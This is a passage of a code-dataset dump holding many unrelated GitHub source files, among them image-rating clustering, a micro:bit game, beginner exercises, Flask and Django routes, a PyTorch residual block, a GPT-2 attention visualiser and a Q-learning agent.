feeling\nValence: 1 ==> negative feeling, 9 ==> positive feeling \nRelevance: 1 ==> irrelevant to climate change, 9 ==> relevant to climate change.\nReference: Ottavi, S., Roussel, S. & Airelle, S. 2021, The French affective images of climate change (FAICC): A Dataset with Relevance and Affective Ratings, \n Frontiers in Psychology, 12. DOI=10.3389/fpsyg.2021.650650. 
\n\nIn our presentation, we focus on Valence and arousal as these descriptors were also used to construct the DEAP database.\n\"\"\"\n\ndef FindClustNum_elbow(fscaled):\n\n kmeans_kwargs = { \"init\": \"random\", \"n_init\": 10, \"max_iter\": 300, \"random_state\": 42 }\n # A list holds the SSE values for each k\n sse = []\n\n for k in range(1, 11):\n kmeans = KMeans(n_clusters=k, **kmeans_kwargs)\n kmeans.fit(fscaled)\n sse.append(kmeans.inertia_)\n\n plt.style.use(\"fivethirtyeight\")\n plt.plot(range(1, 11), sse)\n plt.xticks(range(1, 11))\n plt.xlabel(\"Number of Clusters\")\n plt.ylabel(\"SSE\")\n plt.show()\n\ndef image_save(dir_pics):\n Idir_contents = os.listdir((dir_pics))\n pjpg = [jpgcurr for jpgcurr in Idir_contents if '.jp' in jpgcurr]\n\n for pcnt, pcurr in enumerate(pjpg):\n currpath = os.path.join(dir_pics, pcurr)\n im = Image.open(currpath)\n pbis = pcurr.split('.')\n new_title = pbis[0]+'.png'\n im.save(os.path.join(dir_pics, new_title),\"PNG\")\n\ndata_path = '/Users/bolger/Documents/work/Projects/Visions_ClimateChange/FAICC_Database'\nfname = 'DataBase - FAICC.xlsx'\nfullpath = os.path.join(data_path, fname)\n\ndfIn = pd.read_excel(fullpath, sheet_name='Rating data')\nImageID = list(dfIn['Image ID'])\nArousal_mean = list(dfIn['Arousal Mean'])\nValence_mean = list(dfIn['Valence Mean'])\nRelevance_mean = list(dfIn['Relevance Mean'])\n\nArousal_mean = Arousal_mean[1:-1] # take out the beginning nan value\nValence_mean = Valence_mean[1:-1]\nRelevance_mean = Relevance_mean[1:-1]\nImageID = ImageID[1:-1]\n\nsns.displot(Arousal_mean)\nsns.displot(Valence_mean)\nsns.displot(Relevance_mean)\nsns.displot(x=Arousal_mean, y=Valence_mean)\n\n##%% Carry out Kmeans clustering of the images based on Arousal, Valence and Relevance features\n\nfeatures = np.transpose(np.vstack((Arousal_mean, Valence_mean, Relevance_mean)))\nscaler = StandardScaler()\nfeatures_scaled = scaler.fit_transform(features) # scale features values to have 0 mean and std =1\n\nFindClustNum_elbow(features_scaled)\n\nclusterN = 6\nkmeans = KMeans(init=\"random\", n_clusters=clusterN, n_init=10, max_iter=300, random_state=42)\nkmeans.fit(features_scaled)\n\n##% Scatter-plot of the features and the final centroids.\n\nfeature_class = kmeans.labels_\ncolors = ['red' if ft == 0 else 'green' if ft == 1 else 'blue' if ft == 2 else 'yellow' if ft == 3 else\n 'orange' if ft == 4 else'black' for ft in list(feature_class)]\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\nax.scatter(features_scaled[:,0], features_scaled[:,1], features_scaled[:,2], s=50, c=colors)\nax.set_xlabel('Mean Arousal')\nax.set_ylabel('Mean Valence')\nax.set_zlabel('Mean Relevance')\nplt.show()\n\n##%% Divide the images into cluster groups.\ndir_orig = '/Users/bolger/Documents/work/Projects/Visions_ClimateChange/FAICC_Database/Pictures'\ndiro_contents = os.listdir((dir_orig))\nclass_unique = np.unique(feature_class)\n\nfor classcurr in class_unique:\n CIndx = [classIndx for classIndx, ccurr in enumerate(feature_class) if ccurr==classcurr]\n Image_curr = [ImageID[index] for index in CIndx]\n dirname = 'Images_Class'+str(classcurr+1)\n newpath = os.path.join('../Image_classify/FAICC_Images', dirname)\n if not os.path.exists(newpath):\n os.makedirs(newpath)\n dir_dest = newpath\n\n # Files to move\n for fcount, Icurr in enumerate(Image_curr):\n x_png = str(int(Icurr))+'.png'\n pic2move = [piccur for piccur in diro_contents if x_png == piccur]\n if pic2move == []:\n print(f'Current image {x_png} does not exist.')\n else:\n old_file = 
os.path.join(dir_orig, pic2move[0])\n shutil.copy(old_file, dir_dest)\n\n\n","repo_name":"deebeebolger/VCC_Realtime_task","sub_path":"VCC_FAICC_image_analyse.py","file_name":"VCC_FAICC_image_analyse.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16604496725","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 25 15:19:12 2021\r\n\r\n@author: DELL\r\n\"\"\"\r\n\r\nx=input('Enter the number I will count to ')\r\nx=int(x)\r\ny=1\r\nwhile y<=x:\r\n print(y)\r\n y+=1","repo_name":"edgarllano/Codigos-Python","sub_path":"14_while.py","file_name":"14_while.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30964986317","text":"from microbit import *\nimport radio\nimport random\ntime = 2400\nscore = 0\nmultiplier = 0\ncombo = 0\n#https://www.youtube.com/watch?v=fBGSJ3sbivI\nradio.on()\nradio.config(9)\n\n\ndef round(time, combo, multiplier,score):\n directions = {\"right\": Image.ARROW_E,\n \"for\": Image.ARROW_N,\n \"back\":Image.ARROW_S,\n \"left\":Image.ARROW_W}\n direction = [\"right\",\"left\",\"for\",\"back\"]\n game_won = False\n cur = random.choice(direction)\n display.show(directions[cur])\n start = running_time()\n end = running_time()\n \n \n while end-start < time:\n get = radio.receive()\n if type(get) is str:\n if get == cur:\n game_won = True\n combo += 1\n break\n end = running_time()\n \n #if time > 400:\n # time = int(time* 0.95)\n if combo >= 3:\n multiplier += 1\n combo = 0\n if game_won:\n score += multiplier \n else:\n multiplier = 1\n combo = 0\n return time,combo,multiplier,score\n \n\n\nwhile True:\n if button_a.was_pressed():\n s_start,s_end = running_time(),running_time()\n while s_end - s_start < 170000:\n time,combo,multiplier,score = round(time,combo,multiplier,score)\n display.clear()\n print(score)\n if button_b.was_pressed():\n s_end = s_start + 200000\n display.scroll(str(score),wait=True)\n display.show(Image.HEART)\n sleep(2000)\n display.show(Image.MUSIC_CROTCHET)\n s_end = running_time()\n display.show(Image.MUSIC_QUAVER)\n \n ","repo_name":"ncss/projects-2017-5","sub_path":"project-D/arrowrand MVP.py","file_name":"arrowrand MVP.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24935190009","text":"# Write a Python program to sum all the items in a list\n# Example sum_list([1,2,-8])\n# Return -5\n\ndef sum_list(a):\n sum = 0\n for i in a:\n sum = sum + i\n return sum\n\nprint(sum_list([1,2,-8]))\n \n \n","repo_name":"sanjidat/python-problems","sub_path":"List/sum_list.py","file_name":"sum_list.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39435898631","text":"from collections import deque\n\n\ndef process_molecule(starting_molecule, conversions, step):\n output_molecules = set()\n\n for atom in conversions:\n for swap in conversions[atom]:\n match = starting_molecule.find(atom)\n while match != -1:\n output_molecules.add((starting_molecule[:match] + swap + starting_molecule[match + len(atom):], step))\n match = starting_molecule.find(atom, match + 1)\n\n return output_molecules\n\n\ndef generate_molecules(length, conversions):\n found_molecules = deque(process_molecule(\"e\", conversions, 2))\n molecule_steps = {}\n while 
found_molecules:\n working_mol, w_step = found_molecules.popleft()\n mols = process_molecule(working_mol, conversions, w_step)\n for mol, step in mols:\n if len(mol) < length:\n found_molecules.append((mol, step + 1))\n elif len(mol) == length:\n if not molecule_steps.get(mol):\n molecule_steps[mol] = step\n else:\n molecule_steps[mol] = min(molecule_steps[mol], step)\n\n return molecule_steps\n\n\ninput_file = open(\"input.txt\", \"r\").read().split(\"\\n\")\n\nmolecule = input_file[-1]\ninput_file = input_file[:-1]\n\ntranslations = {}\n\nfor line in input_file:\n m_in, m_out = line.split(\" => \")\n if not translations.get(m_in):\n translations[m_in] = [m_out]\n else:\n translations[m_in].append(m_out)\n\n# molecule=\"HOHOHO\"\nsolution = generate_molecules(len(molecule), translations)\nprint(solution)\nprint(solution[molecule])\n","repo_name":"Kehvarl/adventofcode_2015","sub_path":"19.2-Medicine/Medicine.py","file_name":"Medicine.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10207929426","text":"def ensembl():\n E = {}\n inFile = open('HumanGTF-ids')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n E[fields[0]] = fields[1]\n inFile.close()\n return E\nensembl()\ndef expression(inF, inF2, ouF):\n E = ensembl()\n ouFile = open(ouF, 'w')\n D = {}\n G = []\n inFile = open(inF)\n heads = inFile.readline().strip().split('\\t')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n gene = fields[1].split('.')[0]\n G.append(gene)\n D[gene] = {}\n for i in range(4, len(heads)):\n D[gene][heads[i]] = fields[i]\n inFile.close()\n\n inFile = open(inF2)\n hds = inFile.readline().strip().split('\\t')\n sample = hds[10:]\n\n ouFile.write('GeneSymbol' +'\\t' + 'GeneID'+ '\\t' + '\\t'.join(sample) + '\\n')\n\n for g in G:\n L = []\n for s in sample:\n L.append(D[g].get(s,'-1'))\n\n ouFile.write(E.get(g,'NA') + '\\t' + g + '\\t' + '\\t'.join(L) + '\\n')\n \n \n inFile.close()\n ouFile.close()\n\n\nexpression('GD462.GeneQuantRPKM.50FN.samplename.resk10.txt', 'GEUVADIS.PH1PH2_465.IMPFRQFILT_BIALLELIC_PH.annotv2.genotypes-Genotype-stopgain-formated', 'GD462.GeneQuantRPKM.50FN.samplename.resk10.expression')\n","repo_name":"chw333/StanfordSGTC","sub_path":"NMD/02-1000Genome/465LCLs/06-gene-expression.py","file_name":"06-gene-expression.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42650817067","text":"import populate_integration\nimport pytest\n\n\n@pytest.mark.parametrize('expect_retval,rows', [\n (0, [{'id': 5}]),\n (1, [{'id': 2, 'extra': 'qqq'}])\n])\ndef test_failures_propagate_to_exit_code(expect_retval, rows, spark, mocker):\n mock_spark = mocker.MagicMock()\n mock_spark.createDataFrame.side_effect = spark.createDataFrame\n mock_spark.read.table.return_value = spark.range(0)\n\n # Avoid actual writes in spark, table doesnt exist anyways\n mocker.patch.object(populate_integration.HivePartitionWriter, 'overwrite_with')\n\n retval = populate_integration.main([\n (\n '/path/to/conf',\n {'partition': 'pytest/', 'rows': rows}\n ),\n ], mock_spark)\n assert retval == expect_retval\n\n\ndef test_type_mismatch_fails(spark, mocker):\n mock_spark = mocker.MagicMock()\n mock_spark.createDataFrame.side_effect = spark.createDataFrame\n mock_spark.read.table.return_value = spark.range(0)\n writer = mocker.MagicMock()\n\n try:\n 
populate_integration.import_rows(\n mock_spark, writer, [{'id': 'qqq'}])\n except TypeError as e:\n assert \"can not accept object 'qqq'\" in str(e), e\n else:\n assert False, \"Importing rows with mismatched types must throw TypeError\"\n","repo_name":"wikimedia/wikimedia-discovery-analytics","sub_path":"spark/test/test_populate_integration.py","file_name":"test_populate_integration.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37641396842","text":"from django.conf.urls import url\nfrom views import index, process, remove, delete, logout\napp_name=\"courses_app\"\nurlpatterns = [\n url(r'^$', index, name=\"index\"),\n url(r'^process$', process, name=\"process\"),\n url(r'^remove(?P<id>\\d+)$', remove, name=\"remove\"),\n url(r'^delete/(?P<id>\\d+)$', delete, name=\"delete\"),\n url(r'^logout$', logout, name=\"logout\"),\n # url(r'^dashboard$', dashboard, name=\"dashboard\")\n]\n","repo_name":"LexiPearl/Python-Projects","sub_path":"myEnvironments/integration_project/apps/courses_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72080640107","text":"## process_request.py\n# Primary Owner: Cole Hoffele\n\nimport json\nimport standards\nimport prediction\nimport statistics\nimport jsonToSqlParms\n\nstat_op = {\"mean\":statistics.mean, \"median\":statistics.median, \"mode\":statistics.mode, \"stdev\":statistics.stdev, \"variance\":statistics.variance}\n\ndef sqlParmsToQuery(inputParms, dataInput):\n\n loadedJson = \"\"\n\n ###\n ### Load the Json request\n ###\n try:\n loadedJson = json.loads(dataInput)\n except:\n \treturn standards.InvalidJSON()\n\n query = AnalysisType(loadedJson, inputParms)\n return query\n\n\ndef AnalysisType(loadedJson, inputParms):\n\n operation = loadedJson['operation']\n\n if type(operation) == str and operation == 'lookup':\n return [\"SELECT * FROM pet WHERE \" + inputParms]\n elif str(operation) == \"correlation\":\n if 'X-axis' in loadedJson:\n if 'Y-axis' in loadedJson:\n if 'X-interval' in loadedJson:\n if 'Y-interval' in loadedJson:\n query = correlationType(loadedJson, inputParms)\n return [query]\n\n if type(operation) == type(list()):\n if operation[0] == \"lookup\":\n query = lookupType(loadedJson, inputParms)\n return query\n if(operation[0] == \"prediction\"):\n query = prediction.Predict(loadedJson, inputParms)\n return query\n else:\n return [\"SELECT * FROM pet\"]\n\n\n\ndef correlationType(loadedJson, inputParms):\n\n xAxis = loadedJson['X-axis']\n yAxis = loadedJson['Y-axis']\n xInterval = loadedJson['X-interval']\n if str(xInterval) == \"auto\":\n xInterval = 5\n yInterval = loadedJson['Y-interval']\n if str(yInterval) == \"auto\":\n yInterval = 5\n\n query = \"SELECT count(*) AS TOTAL,FLOOR(pet.\" + str(xAxis) + \"/\" + str(xInterval) + \") AS Interval FROM pet\"\n query = buildQuery(query, inputParms, \"Interval\", \"Interval\")\n\n return query\n\n\n\ndef lookupType(loadedJson, inputParms):\n\n operation = loadedJson['operation']\n query = []\n if operation[1] == \"percentage\":\n query.append(lookupPercentage(loadedJson, inputParms))\n elif operation[1] == \"average\":\n query.append(lookupAverage(loadedJson, inputParms))\n elif operation[1] in stat_op.keys():\n query.append(\"SELECT * FROM pet\")\n query.append(stat_op[operation[1]])\n query.append(list(loadedJson['field'].keys())[0])\n return query\n\n\ndef 
lookupPercentage(loadedJson, inputParms):\n\n if 'group by' in loadedJson:\n groupBy = loadedJson['group by']\n\n equation = \"((((pet.length/0.7062) - pet.height)/0.9156 ) - pet.height)\"\n\n if groupBy == \"bodyType\":\n query = \"SELECT (CAST((((count(*) *1.0) / ( SELECT (COUNT(*) * 1.0) FROM pet )) *100) AS DECIMAL(10,2))) as percentage, count(*) as Count, CASE WHEN \" + equation + \" <= 25 THEN 'Low' WHEN \" + equation + \" > 25 AND \" + equation + \" <= 35 THEN 'Moderate' WHEN \" + equation + \" > 35 AND \" + equation + \" <= 45 THEN 'High' WHEN \" + equation + \" > 45 AND \" + equation + \" <= 55 THEN 'Serious' WHEN \" + equation + \" > 55 AND \" + equation + \" <= 65 THEN 'Severe' WHEN \" + equation + \" > 65 THEN 'Extreme' END AS bodyType FROM pet\"\n\n query = buildQuery(query, inputParms, groupBy, None)\n\n return query\n\ndef lookupAverage(loadedJson, inputParms):\n if loadedJson['operation'][2] != '':\n\n averaged = \"AVG(\" + loadedJson['operation'][2] + \") as avg_\" + loadedJson['operation'][2]\n groupBy = loadedJson['group by']\n\n query = \"SELECT \" + groupBy + \", \" + averaged + \" FROM pet\"\n\n query = buildQuery(query, inputParms, groupBy, None)\n return query\n\n#Use this function after you build the \"SELECT\" part of the query, and nothing else.\ndef buildQuery(query, inputParms, groupBy, orderBy):\n\n if query != None:\n if inputParms != None:\n query = whereClause(query,inputParms)\n if groupBy != None:\n query = groupByClause(query, groupBy)\n if orderBy != None:\n query = orderByClause(query, orderBy)\n else:\n print(\"Query not valid\")\n\n return query\n\n\ndef groupByClause (query, groupBy):\n return query + \" GROUP BY \" + groupBy\n\ndef whereClause (query, inputParms):\n return query + \" WHERE \" + inputParms\n\ndef orderByClause (query, orderBy):\n return query + \" ORDER BY \" + orderBy\n\n\n\n\n\n\n#\n#SELECT CAST(field1 AS DECIMAL(10,2)) field1\n","repo_name":"DeborahStacey/ClinicalAnalysis","sub_path":"ClinicalAnalysisEngine/sqlParmsToQuery.py","file_name":"sqlParmsToQuery.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70804687147","text":"from sqlalchemy_data_models.country import Country\nfrom backend.src.lambda_libs.postgres.postgres_sqlalchemy_crud import (\n select,\n select_reference_table,\n)\nfrom json import dumps\nimport logging\n\n# Setup Logging\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\nlogger = logging.getLogger()\n\nentity_class = Country\n\n\ndef lambda_handler(event, context):\n print(event)\n\n if event[\"httpMethod\"] == \"GET\":\n query_params = event.get(\"queryStringParameters\", {})\n if query_params:\n return select(\n event,\n entity_class,\n entity_class.select_required_params,\n entity_class.all_params_select,\n )\n else:\n return select_reference_table(event, entity_class)\n else:\n method = event[\"httpMethod\"]\n message = f\"{method} method is not allowed\"\n description = f\"{message} on this resource\"\n error = {\n \"errorType\": \"InvalidHttpMethod\",\n \"errorMessage\": message,\n \"errorDescription\": description,\n }\n response = {\"statusCode\": 405, \"body\": dumps(error)}\n return 
response\n","repo_name":"linnla/OutcomesAI","sub_path":"backend/src/lambda_functions/reference_data/countries/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13627161592","text":"import torch\nimport torch.nn as nn\n\nclass ResBlock(nn.Module):\n def __init__(self,\n input_shape,\n kernel_size=(3,3),\n activation=nn.ReLU,\n acti_params = {'inplace': True},\n norm=nn.BatchNorm2d,\n bias=False,\n clip = False,\n clip_val=0):\n super().__init__()\n self.input_shape = input_shape\n self.kernel_size = kernel_size\n self.activation = activation\n self.acti_params = acti_params\n self.norm = norm\n self.clip = clip\n self.clip_val = clip_val\n\n self.channels = input_shape[0]\n self.stride = (1,1)\n pad = (kernel_size[0] -1 )//2\n self.padding = (pad, pad)\n self.stack = nn.Sequential()\n self.bias=bias\n self._build_stack()\n\n def _build_stack(self):\n\n self.stack.add_module('Conv-1',\n nn.Conv2d(self.channels, self.channels,\n kernel_size=self.kernel_size,\n stride=self.stride,\n padding=self.padding,\n bias=self.bias))\n\n self.stack.add_module('Norm-1',\n self.norm(self.channels))\n\n self.stack.add_module('Acti-1',\n self.activation(**self.acti_params))\n\n self.stack.add_module('Conv-2',\n nn.Conv2d(self.channels, self.channels,\n kernel_size=self.kernel_size,\n stride=self.stride,\n padding=self.padding,\n bias=self.bias))\n\n self.stack.add_module('Norm-2',\n self.norm(self.channels))\n\n def forward(self, x):\n out = self.stack(x)\n if self.clip:\n x = torch.clamp(x, -1, self.clip_val)\n return x + out\n return x + out\n\n\nclass ResBlocks(nn.Module):\n def __init__(self,\n input_shape,\n n_blocks=1,\n kernel_size=(3,3),\n activation=nn.ReLU,\n acti_params={},\n norm=nn.BatchNorm2d,\n clip=False,\n clip_val=0):\n\n super().__init__()\n\n self.input_shape = input_shape\n self.n_blocks = n_blocks\n self.kernel_size = kernel_size\n self.activation = activation\n self.acti_params = acti_params\n self.clip = clip\n self.clip_val = clip_val\n self.network = nn.Sequential()\n self._build_network()\n\n def _build_network(self):\n for i in range(self.n_blocks):\n\n self.network.add_module(\n 'res-{}'.format(i+1),\n ResBlock(self.input_shape, self.kernel_size, clip=self.clip,\n clip_val=self.clip_val,\n activation=self.activation,\n acti_params=self.acti_params))\n\n def forward(self, x):\n return self.network(x)\n\n","repo_name":"hyferg/painting-with-baryons","sub_path":"src/models/layers/residual.py","file_name":"residual.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36763773582","text":"# -----------------------------------------------------------\r\n# Given a string of numbers, you must perform a method in which you will translate this string into text, following the next image.\r\n# \r\n# for example if you get 22 you will b, if you get 222 you will return c. if you get 2222 return ca\r\n# \r\n# Here some samples:\r\n# \r\n# 443355555566604466690277733099966688 -> hello how are you., 55282 -> kata.\r\n# \r\n# 1 is used to separate letters with the same number.\r\n# \r\n# always transform the number to the letter with the maximum value, as long as it does not have a 1 in the middle.\r\n# \r\n# 777777 = \"sq\". 
7717777 = \"qs\".\r\n# \r\n# you cant return numbers.\r\n# \r\n# 0 are spaces in the string.\r\n# \r\n# Given a empty string, return empty string.\r\n# \r\n# Return a lowercase string.\r\n# -----------------------------------------------------------\r\n\r\ndef phone_words(string_of_nums):\r\n if string_of_nums == \"\":\r\n return string_of_nums\r\n return string_of_nums.replace(\"9999\", \"z\")\\\r\n .replace(\"999\", \"y\").replace(\"99\", \"x\").replace(\"9\", \"w\")\\\r\n .replace(\"888\", \"v\").replace(\"88\", \"u\").replace(\"8\", \"t\")\\\r\n .replace(\"7777\", \"s\")\\\r\n .replace(\"777\", \"r\").replace(\"77\", \"q\").replace(\"7\", \"p\")\\\r\n .replace(\"666\", \"o\").replace(\"66\", \"n\").replace(\"6\", \"m\")\\\r\n .replace(\"555\", \"l\").replace(\"55\", \"k\").replace(\"5\", \"j\")\\\r\n .replace(\"444\", \"i\").replace(\"44\", \"h\").replace(\"4\", \"g\")\\\r\n .replace(\"333\", \"f\").replace(\"33\", \"e\").replace(\"3\", \"d\")\\\r\n .replace(\"222\", \"c\").replace(\"22\", \"b\").replace(\"2\", \"a\")\\\r\n .replace(\"1\", \"\").replace(\"0\", \" \")\r\n\r\n# -----------------------------------------------------------\r\n# License\r\n# Tasks are the property of Codewars (https://www.codewars.com/) \r\n# and users of this resource.\r\n# \r\n# All solution code in this repository \r\n# is the personal property of Vladimir Rukavishnikov\r\n# (vladimirrukavishnikovmail@gmail.com).\r\n# \r\n# Copyright (C) 2022 Vladimir Rukavishnikov\r\n# \r\n# This file is part of the HungryVovka/Codewars-Python\r\n# (https://github.com/HungryVovka/Codewars-Python)\r\n# \r\n# License is GNU General Public License v3.0\r\n# (https://github.com/HungryVovka/Codewars-Python/blob/main/LICENSE.md)\r\n# \r\n# You should have received a copy of the GNU General Public License v3.0\r\n# along with this code. 
If not, see http://www.gnu.org/licenses/\r\n# -----------------------------------------------------------","repo_name":"HungryVovka/Codewars-Python","sub_path":"6 kyu/PhoneWords.py","file_name":"PhoneWords.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8760537335","text":"import logging\n\nfrom flask import Blueprint, request\n\nfrom backend.blueprint import (\n get_current_user_handler,\n basic_carrier_result,\n)\nfrom backend.data.pagination_carrier import PaginationParams\nfrom backend.data.unit_of_work import SqlAlchemyUOW\nfrom backend.model.edit.master_organization_em import MasterOrganizationEm\nfrom backend.service.master_organization_service import (\n get_organization_list_for_management,\n create_or_update_master_organization,\n delete_organization_by_id,\n get_organization_selection,\n get_guest_login_organization_selection,\n)\nfrom backend.utility.route_premission_helper import RoutePermissionHelper\n\nmaster_organization_blueprint = Blueprint(\n name=\"master_organization\",\n import_name=__name__,\n url_prefix=\"/organization\",\n)\nroute_permission = RoutePermissionHelper(master_organization_blueprint, group=\"Organization management\")\n\n\n@master_organization_blueprint.route('/get-organization-management-list', methods=['POST'])\n@route_permission.set(name=\"Get list\")\n@basic_carrier_result()\ndef route_get_list_for_management():\n data = request.get_json(silent=True)\n return get_organization_list_for_management(\n params=PaginationParams(**data)\n )\n\n\n@master_organization_blueprint.route('/create-or-update', methods=['POST'])\n@route_permission.set(name=\"Edit organization\")\n@basic_carrier_result()\ndef route_create_or_update_organization():\n data = request.get_json(silent=True)\n with SqlAlchemyUOW(\n handler=get_current_user_handler(),\n action=\"create-or-update-organization\",\n action_params=data,\n ) as uow:\n return create_or_update_master_organization(\n data=MasterOrganizationEm(**data),\n transaction=uow.transaction,\n )\n\n\n@master_organization_blueprint.route('/delete/<org_id>', methods=['GET'])\n@route_permission.set(name=\"Delete organization\")\n@basic_carrier_result()\ndef route_delete_organization(org_id: str):\n with SqlAlchemyUOW(\n handler=get_current_user_handler(),\n action=\"delete-organization\",\n action_params={\"id\": org_id},\n ) as uow:\n return delete_organization_by_id(\n organization_id=org_id,\n transaction=uow.transaction,\n )\n\n\n@master_organization_blueprint.route('/get-selection', methods=['POST'])\n@route_permission.set(name=\"Get selection list\")\n@basic_carrier_result()\ndef route_get_organization_selection():\n params = request.get_json(silent=True)\n return get_organization_selection(params)\n\n\n@master_organization_blueprint.route('/guest-login-selection', methods=['GET'])\n@route_permission.set(name=\"Guest-login organization selection list\", login_required=False, allow_all=True)\n@basic_carrier_result()\ndef route_get_guest_login_organization_selection():\n return get_guest_login_organization_selection()\n","repo_name":"Philogag/The-Project-Demo","sub_path":"backend/blueprint/master_organization_blueprint.py","file_name":"master_organization_blueprint.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71926141547","text":"import matplotlib\nfrom flask import Flask, render_template, url_for, request, redirect, Markup\nfrom transformers import GPT2Model, GPT2Tokenizer, GPT2LMHeadModel\nimport 
matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport os\n\nmatplotlib.use('Agg')\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/generate_plot', methods=['POST'])\ndef generate_plot():\n model = GPT2Model.from_pretrained('gpt2', output_attentions=True)\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2')\n\n text = request.form['text']\n min_font_size = int(request.form['min_font_size'])\n max_font_size = int(request.form['max_font_size'])\n inputs = tokenizer.encode(text, return_tensors='pt')\n outputs = model(inputs)\n all_layer_attentions = outputs.attentions\n\n last_layer_attentions = all_layer_attentions[-1][0, 0, :, :].detach().numpy()\n tokens = tokenizer.tokenize(text)\n tokens = [token.replace('Ġ', '') for token in tokens]\n attention_text = generate_attention_text(\n tokens, last_layer_attentions, min_font_size, max_font_size)\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xlabel('Token Position')\n ax.set_ylabel('Layer')\n ax.set_zlabel('Attention Score')\n\n for i, layer_attention in enumerate(all_layer_attentions):\n layer_attention = layer_attention[0, 0, :, :].detach().numpy()\n X = np.arange(layer_attention.shape[0])\n Y = np.arange(layer_attention.shape[1])\n X, Y = np.meshgrid(Y, X)\n Z = layer_attention\n ax.plot_surface(X, Y, Z, cmap='coolwarm')\n\n ax.set_xticks(np.arange(len(tokens)))\n ax.set_xticklabels(tokens, rotation=90)\n\n plt.savefig(os.path.join('static', 'images', 'plot.png'))\n\n generation_model = GPT2LMHeadModel.from_pretrained('gpt2')\n generated_output = generation_model.generate(\n inputs, max_length=150, do_sample=True)\n generated_text = tokenizer.decode(\n generated_output[0], skip_special_tokens=True)\n\n return render_template('index.html', attention_text=attention_text, generated_text=generated_text)\n\n\ndef generate_attention_text(tokens, attentions, min_font_size=10, max_font_size=32):\n # Average attention scores over all heads\n avg_attention = np.mean(attentions, axis=0)\n min_val = np.min(avg_attention)\n max_val = np.max(avg_attention)\n norm_attentions = (avg_attention - min_val) / (max_val - min_val)\n\n # Scale font size by attention score. 
Range from min_font_size to max_font_size.\n scaled_font_sizes = min_font_size + \\\n (max_font_size - min_font_size) * norm_attentions\n attention_text = ''\n for token, font_size, attention in zip(tokens, scaled_font_sizes, norm_attentions):\n color_intensity = int(255 * attention)\n color = f'rgb({color_intensity}, 0, {255-color_intensity})'\n attention_text += f'<span style=\"color: {color}; font-size: {font_size}px\">{token}</span> '\n\n return Markup(attention_text)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"yU-kiki/attention_visualization","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1481765958","text":"import gym\nimport math\nimport random\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n\nclass QAgent():\n def __init__(self, env, buckets=(3, 3, 6, 6,), min_alpha=0.1, min_epsilon=0.1, gamma=1.0, ada_divisor=20):\n self.env = env # for choosing different environments\n self.buckets = buckets # down-scaling feature space to discrete range\n self.min_alpha = min_alpha # learning rate\n self.min_epsilon = min_epsilon # exploration rate\n self.gamma = gamma # discount factor\n self.ada_divisor = ada_divisor # decay rate parameter for alpha and epsilon\n\n # initialising Q-table\n self.Q = np.zeros(self.buckets + (self.env.action_space.n,))\n\n # Discretizing input space to make Q-table and to reduce dimensionality\n def discretize(self, state):\n upper_bounds = [self.env.observation_space.high[0], 0.5, self.env.observation_space.high[2], math.radians(50)]\n lower_bounds = [self.env.observation_space.low[0], -0.5, self.env.observation_space.low[2], -math.radians(50)]\n ratios = [(state[i] + abs(lower_bounds[i])) / (upper_bounds[i] - lower_bounds[i]) for i in range(len(state))]\n discretized_state = [int(round((self.buckets[i] - 1) * ratios[i])) for i in range(len(state))]\n discretized_state = [min(self.buckets[i] - 1, max(0, discretized_state[i])) for i in range(len(state))]\n return tuple(discretized_state)\n\n # Choosing action based on epsilon-greedy policy\n def choose_action(self, state, epsilon):\n return self.env.action_space.sample() if (np.random.random() <= epsilon) else np.argmax(self.Q[state])\n\n # Updating Q-value of state-action pair based on the Bellman equation\n def update_q(self, state, action, reward, next_state, alpha):\n self.Q[state][action] 